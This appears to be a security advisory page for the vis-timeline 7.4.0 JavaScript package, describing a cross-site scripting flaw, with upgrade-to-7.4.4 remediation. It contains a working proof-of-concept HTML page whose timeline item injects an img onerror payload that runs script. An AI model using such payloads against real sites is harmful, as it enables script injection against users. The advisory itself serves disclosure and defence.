vis-timeline@7.4.0 vulnerabilities

Create a fully customizable, interactive timeline with items and ranges.

Direct Vulnerabilities

Known vulnerabilities in the vis-timeline package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Scripting (XSS)

vis-timeline is a Timeline/Graph2D is an interactive visualization chart to visualize data in time

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). An attacker with the ability to control the items of a Timeline element can inject additional script code into the generated application.

PoC

<!DOCTYPE html>
<html>
<script src="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.min.js" integrity="sha512-3FADGlV0gOpnQn56VOryrvOeY1zMrNiSMyDnxD/5ZEBJgt5n+IcAvfzm16/Cwyhro9RJgFgBWeoUmLceNgbTrA==" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.css" integrity="sha512-GFG4HXPbPcM487tbwN4sscz1AVK9uQcY7Y6uWwLlgWbAXCJI2V/n7Em7vKpH+Q1cqQh1PyCavHr94KaWi0UgOA==" crossorigin="anonymous" />
    
    <body>
<style>
body,
html {
  font-family: sans-serif;
}
</style>
<p>A basic timeline. You can move and zoom the timeline, and select items.</p>
<div id="visualization"></div>
<script>
// DOM element where the Timeline will be attached
var container = document.getElementById("visualization");

// Create a DataSet (allows two way data-binding)
var items = new vis.DataSet([
  { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
  { id: 2, content: "item 2", start: "2014-04-14" },
  { id: 3, content: "item 3", start: "2014-04-18" },
  { id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
  { id: 5, content: "item 5", start: "2014-04-25" },
  { id: 6, content: "item 6", start: "2014-04-27", type: "point" },
]);

// Configuration for the Timeline
var options = {};
var timeline = new vis.Timeline(container, items, options);
</script>

    </body>
</html>

How to fix Cross-site Scripting (XSS)?

Upgrade vis-timeline to version 7.4.4 or higher.

<7.4.4